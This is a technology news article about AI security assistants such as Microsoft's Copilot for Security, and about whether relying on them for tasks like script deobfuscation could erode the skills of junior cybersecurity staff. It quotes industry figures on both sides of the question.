As AI seeps into every corner of the tech sector and beyond, a wave of security tools have flooded the market, promising to simplify cyber operations for businesses and professionals.
An important part of the value proposition that vendors are trying to make with AI security assistants is that companies can free up overstretched security teams by automating the most mundane and repetitive tasks in their workflow.
Many of the latest security assistants introduced by Microsoft, Cisco, Check Point and others can automate tasks that used to bog down workers, like organizing the overwhelming flow of alerts that security teams deal with every day.
Mandiant research in 2023 He specifically highlighted “information overload” as a key barrier to effective threat intelligence.. It's a problem plaguing security teams across the industry, the company said, contributing to staff burnout and poorer performance.
In theory, AI security tools should allow security personnel to focus on critical tasks that require human attention. Research from Censornet, for example, found that 49% of SMBs believe AI will improve their cyber defenses by freeing up security teams to proactively investigate risks.
After announcing that its Copilot for Security would be generally available starting April 1, 2024, Microsoft said its assistant could perform documentation tasks, a common problem for security teams, 46% faster than a human and with greater precision.
Another task that security professionals often get stuck on is manually reverse engineering obfuscated scripts. Attackers will obfuscate the scripts used in their attack chain to hide their methods and keep victims in the dark.
With the skills shortage plaguing the security industry, finding security personnel who have the knowledge and experience to manually decode these scripts is becoming an arduous task for companies.
Microsoft, naturally, said its tool will unlock huge productivity gains by allowing junior security analysts to reverse engineer such scripts without having to constantly consult senior colleagues.
No longer reliant on more knowledgeable senior colleagues, junior security staff will be able to use AI assistants to take on tasks that may previously have been above their skill level, but what does this really mean for their development?
By virtue of foregoing the learning process for senior staff who might divulge useful tricks of the trade or identify knowledge gaps in new team members, will the skill levels of new cyber professionals be affected as a result of these new security co-pilots? ? ?
speaking to ITPro, Jeff Watkins, director of product and technology at xDesign, said the benefits that AI adoption can bring to cybersecurity are clear, specifically in terms of automation.
“If there is one field that has huge potential for AI adoption, aside from the obvious customer support/CRM, it is cybersecurity,” he explained.
“From attack analysis and simulations to reverse engineering and adaptive countermeasures, there is great potential in the area to intelligently automate processes and content generation. In many ways, this is a good thing, given the size of most security teams, as even in a well-resourced organization there is typically one security professional for every 100 developers/technologists.”
But concerns about skills erosion are legitimate, Watkins said, citing the digital amnesia associated with 'The Google effect' and the worst case scenario, where poorly trained cyber professionals are unable to tackle new sophisticated attacks.
“There are a number of important factors in the adoption of AI in the context of cybersecurity, the first of which is analogous to 'The Google effect'. “With too much AI assistance, there is a chance that security engineers will end up relying entirely on how to leverage the AI assistant instead of learning how to solve problems themselves,” he warned.
“This has the greatest potential for impact in an organization that uses AI tools rather than good mentoring and a match/follow approach.”
“The nightmare scenario is that cybersecurity allows itself to become de-skilled across organizations, meaning innovative new threats leave the team feeling powerless to solve problems and get out of the situation.”
AI is not a cyber “magic bullet,” but it could actually help cyber skills
Chris Stouff, chief strategy officer at Armor Defense, said ITPro It is important for companies to recognize the competencies and limitations of AI assistants, highlighting the continued importance of a robust, human-led security operations center (SOC).
“I think the portrayal of AI as a 'silver bullet' for cybersecurity is dangerous. While I agree that its use will be beneficial for things like automating repetitive security tasks, what worries me is the inference that AI, like some of the security products and services hailed before, could become an standalone solution that will somehow override the requirement. for an effective Security Operations Center (SOC).
Stouff explained why AI is not the panacea that struggling security leaders might hope for, lacking a human's situational awareness, judgment, and ability to prioritize tasks.
Mike Isbitski, director of Cybersecurity Strategy at monitoring suite Sysdig, echoed these thoughts and warned against exaggerating the effect AI will have on skill levels among cyber professionals.
Isbitski noted that in the long term, AI assistants could help younger team members improve their skills.
“Concerns about security teams becoming complacent about overusing AI to do their jobs are overblown,” he said.
“The rapid adoption of generative AI is similar to calculators and computers becoming ubiquitous in classrooms over the past few decades. It is inevitable and generative AI is another powerful tool. “Technology should be adopted as it will allow young professionals to acquire skills more quickly and security programs to scale appropriately to mitigate advanced threats.”